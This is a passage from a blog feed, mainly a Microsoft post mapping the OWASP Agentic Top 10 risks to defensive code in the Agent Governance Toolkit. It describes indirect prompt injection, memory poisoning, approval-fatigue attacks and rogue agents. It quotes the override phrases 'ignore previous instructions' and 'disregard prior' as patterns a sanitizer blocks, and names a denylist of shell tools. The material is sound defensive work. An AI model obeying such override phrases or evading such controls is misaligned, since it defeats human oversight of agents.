&lt;H3 aria-level="3"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;prompts.chat&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;A href="https://prompts.chat/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;prompts.chat&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;,&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;formerly Awesome ChatGPT Prompts, is a curated collection of prompt examples for AI chat models. The project is designed to help people discover, share, and build better prompts for modern AI assistants.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Created by&amp;nbsp;&lt;/SPAN&gt;&lt;A href="https://stars.github.com/profiles/f/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Fatih Kadir Akın&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, a&amp;nbsp;&lt;/SPAN&gt;&lt;A href="https://stars.github.com/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;GitHub Star&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;from Istanbul,&amp;nbsp;prompts.chat&amp;nbsp;reflects his work at the intersection of open source, developer education, and AI-assisted development. Fatih leads Developer Relations at&amp;nbsp;Teknasyon, has authored books on JavaScript and prompt engineering, and is active in the community as a speaker, organizer, and contributor.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Stop by&amp;nbsp;to explore&amp;nbsp;prompt libraries, prompt engineering resources, self-hosting options, and ways the community is making prompting more reusable and collaborative.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2 aria-level="2"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Register for Microsoft Build&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H2&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft Build takes place June 2–3, 2026, in San Francisco and online. In-person passes are available, and online registration is free for livestreamed keynote and select session access.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;&lt;A class="lia-external-url" href="https://build.microsoft.com/" target="_blank"&gt;Register for Microsoft Build&lt;/A&gt; and&amp;nbsp;come visit&amp;nbsp;the&amp;nbsp;Open Source&amp;nbsp;Zone to meet the teams behind&amp;nbsp;OpenClaw,&amp;nbsp;AutoGPT, Open&amp;nbsp;WebUI, and&amp;nbsp;prompts.chat.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;We’ll&amp;nbsp;see you there.&amp;nbsp;&amp;lt;3&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;</description>
      <pubDate>Fri, 29 May 2026 17:34:29 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/four-open-source-projects-to-explore-at-microsoft-build/ba-p/4523744</guid>
      <dc:creator>leereilly</dc:creator>
      <dc:date>2026-05-29T17:34:29Z</dc:date>
    </item>
    <item>
      <title>Governing AI Agents Against Every OWASP Agentic Risk: A Deep Dive with the Agent Governance Toolkit</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/governing-ai-agents-against-every-owasp-agentic-risk-a-deep-dive/ba-p/4523749</link>
      <description>&lt;P&gt;AI agents are moving from prototypes to production. They book flights, write code, negotiate contracts, and operate across enterprise systems with minimal human oversight. The attack surface is not theoretical: &lt;STRONG&gt;&lt;A class="lia-external-url" href="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/" target="_blank"&gt;OWASP has catalogued the top 10 risks specific to agentic applications, and every one of them maps to a real-world failure mode&lt;/A&gt;.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank"&gt;Agent Governance Toolkit (AGT) &lt;/A&gt;is an open-source, MIT-licensed framework that enforces deterministic governance at runtime, before every tool call, message, and action an agent takes. This is not prompt engineering or guardrails bolted on after the fact. AGT provides policy-as-code enforcement, zero-trust identity, execution isolation, and tamper-evident audit trails across the full agent lifecycle.&lt;/P&gt;
&lt;P&gt;In this post, we walk through all 10 OWASP Agentic risks with real code from the AGT repository. By the end, you will have concrete examples for every risk category and a clear path to production-grade agent governance.&lt;/P&gt;
&lt;H2&gt;Coverage at a Glance&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 94.4444%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;#&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;OWASP Risk&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AGT Component&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Key Mechanism&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-01&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent Goal Hijack&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent OS&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Policy Engine + Action Interception&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-02&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Tool Misuse &amp;amp; Exploitation&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent OS&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Capability Sandboxing + Input Sanitization&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-03&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Identity &amp;amp; Privilege Abuse&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AgentMesh&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;DID Identity + Trust Scoring&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-04&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Supply Chain Vulnerabilities&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AgentMesh&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI-BOM (Model + Data + Weights Provenance)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-05&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Unexpected Code Execution&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent Runtime&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Execution Rings (Ring 0-3)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-06&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Memory &amp;amp; Context Poisoning&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent OS&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;VFS Policies + CMVK Verification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-07&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Insecure Inter-Agent Comms&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AgentMesh&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;IATP + E2E Encrypted Channels&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-08&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cascading Agent Failures&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent SRE&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Circuit Breakers + SLOs&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-09&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Human-Agent Trust Exploitation&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent OS&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Approval Workflows + Quorum Logic&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;ASI-10&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Rogue Agents&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agent Runtime&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Kill Switch + Ring Isolation + Merkle Audit&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;ASI-01: Agent Goal Hijack&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Attackers manipulate the agent's objectives via indirect prompt injection or poisoned inputs. The agent believes it is following its original instructions, but it has been redirected.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AGT mitigates this through the Agent OS policy engine. Every agent action passes through a declarative policy evaluation layer before execution. The policy engine supports three modes: strict (deny by default), permissive (allow by default), and audit (log only). Unauthorized goal changes are blocked at the action layer, not at the prompt layer.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_os import StatelessKernel, ExecutionContext

kernel = StatelessKernel()
ctx = ExecutionContext(agent_id="my-agent", policies=["read_only"])

# This action is blocked by policy -- goal hijack prevented
result = await kernel.execute(
    action="delete_database",
    params={"target": "production"},
    context=ctx,
)
# result.success = False, result.error = "Policy violation: read_only"&lt;/LI-CODE&gt;
&lt;P&gt;The MCP Governance Proxy extends this to Model Context Protocol tool calls, evaluating policy before any tool invocation reaches the agent runtime.&lt;/P&gt;
&lt;H2&gt;ASI-02: Tool Misuse &amp;amp; Exploitation&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: An agent's authorized tools are abused in unintended ways, such as exfiltrating data via read operations or chaining benign tools into dangerous workflows.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AGT provides capability-based security inspired by POSIX. Agents receive explicit capability grants (read, write, execute, network), not blanket tool access. The built-in strict mode blocks dangerous tools like run_shell, execute_command, and eval. Tool inputs are sanitized for command injection patterns and shell metacharacters.&lt;/P&gt;
&lt;P&gt;The verify_code_safety MCP tool checks generated code before execution, and tool allowlists/denylists give operators fine-grained control over which tools each agent can invoke.&lt;/P&gt;
&lt;H2&gt;ASI-03: Identity &amp;amp; Privilege Abuse&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Agents escalate privileges by abusing identities or inheriting excessive credentials. Without proper identity, agents operate as ambient authority, and any compromise cascades.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AgentMesh implements zero-trust identity using Decentralized Identifiers (DIDs). Every agent gets a cryptographic identity: did:agentmesh:{agentId}:{fingerprint} backed by Ed25519 key pairs. Trust is earned through a tiered model: Untrusted, Provisional, Trusted, Verified. Trust decays over time without positive signals, and delegation chains must always narrow scope (child capabilities must be a subset of parent capabilities).&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agentmesh import AgentIdentity

identity = AgentIdentity.create(
    name="data-analyst",
    sponsor="admin@contoso.com",
    capabilities=["read:data"],  # Scoped -- cannot write or delete
)

# Delegation MUST narrow, never widen
child = identity.delegate(
    name="chart-helper",
    capabilities=["read:data:charts"],  # Subset of parent
)&lt;/LI-CODE&gt;
&lt;H2&gt;ASI-04: Agentic Supply Chain Vulnerabilities&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Vulnerabilities in third-party tools, plugins, agent registries, or runtime dependencies that agents use to act, plan, or delegate.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AgentMesh implements the AI-BOM (AI Bill of Materials), a comprehensive standard for tracking the full AI supply chain. This includes model provenance (base model ancestry, fine-tuning history, training cutoff dates), dataset tracking (training data, RAG sources, evaluation benchmarks with data cards including PII status, bias assessment, and consent tracking), weights versioning (SHA-256 hashes, quantization records, LoRA adapter metadata, SLSA build provenance), and software dependencies (SPDX-aligned package tracking with CI security scanning).&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# AI-BOM tracks the full supply chain
ai_bom = {
    "modelProvenance": {
        "primary": {"provider": "anthropic", "model": "claude-3-sonnet"},
        "fineTuning": {"method": "LoRA", "evaluationMetrics": {"accuracy": 0.94}},
    },
    "datasets": [
        {"name": "FAQ KB", "type": "fine-tuning", "dataCard": {"piiStatus": "redacted"}},
        {"name": "Product Docs", "type": "rag-source", "updateFrequency": "weekly"},
    ],
    "weights": {"hash": "sha256:...", "format": "safetensors", "precision": "bf16"},
}&lt;/LI-CODE&gt;
&lt;H2&gt;ASI-05: Unexpected Code Execution&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Agents trigger remote code execution through tools, interpreters, or APIs. Without isolation, a single compromised tool call can escalate to full system access.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Agent Runtime implements CPU ring-inspired execution isolation. Agents run in one of four execution rings: Ring 0 (root/supervisor), Ring 1 (privileged), Ring 2 (standard), and Ring 3 (sandbox/untrusted). Each ring has resource limits and the kill switch provides instant termination of runaway agents.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from hypervisor.models import (
    ActionDescriptor,
    ExecutionRing,
    ReversibilityLevel,
)
from hypervisor.rings.enforcer import RingEnforcer
from hypervisor.security.kill_switch import KillSwitch, KillReason

# Define agent privilege levels
AGENTS = {
    "supervisor": {"ring": ExecutionRing.RING_0_ROOT, "role": "Orchestrator"},
    "data-agent": {"ring": ExecutionRing.RING_1_PRIVILEGED, "role": "Data Engineer"},
    "analyst": {"ring": ExecutionRing.RING_2_STANDARD, "role": "Analyst"},
    "user-bot": {"ring": ExecutionRing.RING_3_SANDBOX, "role": "User-Facing"},
}

# Create a sandboxed action descriptor
action = ActionDescriptor(
    name="run_query",
    required_ring=ExecutionRing.RING_2_STANDARD,
    reversibility=ReversibilityLevel.REVERSIBLE,
)

# Enforce: sandbox agent cannot run a Ring 2 action
enforcer = RingEnforcer()
result = enforcer.check(agent_ring=ExecutionRing.RING_3_SANDBOX, action=action)
# result.allowed = False -- ring violation prevented

# Kill switch for runaway agents
kill_switch = KillSwitch()
kill_switch.terminate(agent_id="user-bot", reason=KillReason.RING_BREACH)&lt;/LI-CODE&gt;
&lt;H2&gt;ASI-06: Memory &amp;amp; Context Poisoning&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Persistent memory or long-running context is poisoned with malicious instructions. An attacker embeds hostile content in a document the agent later retrieves, causing it to follow injected goals.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Agent OS provides a policy-controlled virtual filesystem (VFS) for agent memory. The VFS uses POSIX-style mount points: /mem/working for current context, /mem/episodic for past interactions, /mem/semantic for knowledge, /policy for read-only policy files, and /tools for tool interfaces. Each mount point has enforced permissions (read, write, execute, append). The policy directory is always read-only from user-space, preventing agents from modifying their own governance rules.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_control_plane.vfs import AgentVFS, MemoryBackend, FileMode

# Create agent VFS with POSIX-style memory abstraction
vfs = AgentVFS(agent_id="data-analyst")

# Mount memory backends with explicit permissions
vfs.mount("/mem/working", MemoryBackend(), mode=FileMode.READ | FileMode.WRITE)
vfs.mount("/mem/semantic", MemoryBackend(), mode=FileMode.READ)  # Read-only knowledge
vfs.mount("/policy", MemoryBackend(), mode=FileMode.READ)  # Policies always read-only

# Agent can read working memory
data = vfs.read("/mem/working/context.json")

# Agent CANNOT write to policy -- enforced at VFS layer
# vfs.write("/policy/rules.yaml", content)  # Raises PermissionError

# Agent CANNOT read semantic memory if not mounted
# vfs.read("/mem/procedural/skills")  # Raises FileNotFoundError&lt;/LI-CODE&gt;
&lt;P&gt;The CMVK (Cross-Model Verification Kernel) adds a second layer: claims from agent context are verified across multiple AI models to detect poisoned content. Prompt injection patterns like 'ignore previous instructions' and 'disregard prior' are detected and blocked by the MCP proxy sanitizer before reaching the agent.&lt;/P&gt;
&lt;H2&gt;ASI-07: Insecure Inter-Agent Communication&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Agents collaborate without adequate authentication, confidentiality, or validation. Messages between agents can be intercepted, forged, or replayed.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AgentMesh provides IATP (Inter-Agent Trust Protocol) with E2E encrypted channels using the Signal protocol (X3DH key agreement + Double Ratchet). Every message gets per-message forward secrecy and post-compromise security. The EncryptedTrustBridge requires a successful trust handshake before any encrypted channel can be established, and mutual authentication via Ed25519 challenge-response ensures both parties prove identity at connection time.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agentmesh.encryption.bridge import EncryptedTrustBridge

bridge = EncryptedTrustBridge(agent_did="did:mesh:alice", key_manager=keys)
channel = await bridge.open_secure_channel("did:mesh:bob", bob_bundle)
ciphertext = channel.send(b"governed action")  # E2E encrypted&lt;/LI-CODE&gt;
&lt;H2&gt;ASI-08: Cascading Agent Failures&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: An initial error or compromise triggers multi-step compound failures across chained agents. One agent's failure propagates through the entire system.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Agent SRE brings production-grade reliability engineering to agent fleets. Circuit breakers automatically isolate failing agents before failures cascade. SLO enforcement with error budgets provides quantified failure tolerance that triggers automatic intervention. Cascading failure detection monitors dependency chains for propagation patterns, and canary deploys enable gradual rollout of agent changes to detect issues early. OpenTelemetry integration provides distributed tracing across multi-agent workflows.&lt;/P&gt;
&lt;P&gt;The key insight: treat AI agents like microservices. Apply the same SRE discipline (SLOs, error budgets, circuit breakers, chaos testing) that keeps cloud infrastructure reliable.&lt;/P&gt;
&lt;H2&gt;ASI-09: Human-Agent Trust Exploitation&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Attackers leverage misplaced user trust in agents' autonomy to authorize dangerous actions. Users rubber-stamp agent requests because they trust the agent, and attackers exploit this approval fatigue.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Agent OS implements approval workflows that require explicit human confirmation for high-risk actions. The system supports configurable risk assessment (critical, high, medium, low), quorum logic for critical actions requiring multiple approvals, and expiration tracking to prevent stale authorizations. The escalation handler includes fatigue detection: if an agent floods reviewers with escalation requests, subsequent requests are auto-denied to prevent the approval-fatigue attack.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agent_os.integrations.escalation import (
    EscalationHandler,
    InMemoryApprovalQueue,
    DefaultTimeoutAction,
    QuorumConfig,
)

# Configure approval workflow with fatigue protection
handler = EscalationHandler(
    backend=InMemoryApprovalQueue(),
    timeout_seconds=300,                         # 5-minute approval window
    default_action=DefaultTimeoutAction.DENY,    # Deny if no human responds
    quorum=QuorumConfig(required=2, total=3),    # 2-of-3 approvers for critical
    fatigue_threshold=5,                         # Auto-deny after 5 rapid requests
    fatigue_window_seconds=60,                   # Within a 60-second window
)

# Three-outcome model: allow, deny, or escalate
# High-risk actions trigger escalation to human reviewers
# If the agent triggers too many escalations, fatigue detection kicks in&lt;/LI-CODE&gt;
&lt;H2&gt;ASI-10: Rogue Agents&lt;/H2&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;The risk: Agents operating outside their defined scope through configuration drift, reprogramming, or emergent misbehavior. A rogue agent might gradually expand its actions beyond its mandate without any single action triggering a block.&lt;/STRONG&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;AGT combines runtime behavioral monitoring with instant kill capability. Ring isolation confines rogue agents to their execution ring, preventing privilege escalation. The kill switch provides immediate termination for agents exhibiting rogue behavior (behavioral drift, rate limit violations, ring breaches). Trust score decay tracks agent behavior over time, and the Merkle audit chain provides tamper-evident, cryptographic proof of every agent action.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agentmesh.governance.audit import AuditEntry, MerkleAuditChain
from hypervisor.security.kill_switch import KillSwitch, KillReason

# Tamper-evident audit trail
chain = MerkleAuditChain()

entry = AuditEntry(
    event_type="tool_call",
    agent_did="did:agentmesh:data-bot:abc123",
    action="query_database",
    outcome="allowed",
    policy_decision="permit",
    matched_rule="read_only_policy",
)
chain.add_entry(entry)  # Auto-computes hash chain

# Verify integrity -- any tampering breaks the chain
proof = chain.get_proof(entry.entry_id)
assert chain.verify_proof(proof)  # Cryptographic verification

# Kill switch for rogue behavior
kill = KillSwitch()
kill.terminate(
    agent_id="data-bot",
    reason=KillReason.BEHAVIORAL_DRIFT,  # Also: RATE_LIMIT, RING_BREACH, MANUAL
)&lt;/LI-CODE&gt;
&lt;H2&gt;Cross-Cutting Principle: Least Agency&lt;/H2&gt;
&lt;P&gt;The Least Agency principle is emphasized throughout the OWASP Agentic Top 10 as a foundational design principle. Agents should be granted the minimum capabilities, permissions, and autonomy necessary to complete their assigned tasks.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 88.8889%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Layer&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Least Agency Mechanism&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Agent OS&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Policy engine enforces deny-by-default; agents must be explicitly granted each capability&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AgentMesh&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;DID identity with scoped capabilities; delegation requires narrowing (child &amp;lt;= parent)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Agent Runtime&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Execution rings (Ring 0-3) enforce privilege tiers; untrusted agents run in Ring 3&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Agent SRE&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Resource limits and error budgets cap agent impact radius&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;Performance: Governance Without Latency Tax&lt;/H2&gt;
&lt;P&gt;A common concern with runtime governance is performance overhead. AGT's benchmarks demonstrate that policy enforcement adds negligible latency:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Metric&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Value&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Single rule evaluation&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;84,000 ops/sec&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;1000 concurrent agents&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;47,000 ops/sec&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Policy evaluation latency&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;0.1ms (p99)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Prompt-based violation rate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;26.67%&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AGT policy violation rate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;0.00%&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Conformance tests&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;992&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Architecture Decision Records&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;25&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;The key takeaway: deterministic policy enforcement is orders of magnitude more reliable than prompt-based guardrails, and it runs fast enough for real-time agent workloads.&lt;/P&gt;
&lt;H2&gt;Framework Integrations&lt;/H2&gt;
&lt;P&gt;AGT is framework-agnostic. SDKs are available in Python, TypeScript, .NET, Rust, and Go. Native integrations exist for:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;LangChain and LangGraph&lt;/LI&gt;
&lt;LI&gt;CrewAI&lt;/LI&gt;
&lt;LI&gt;AutoGen (Microsoft)&lt;/LI&gt;
&lt;LI&gt;Semantic Kernel (Microsoft)&lt;/LI&gt;
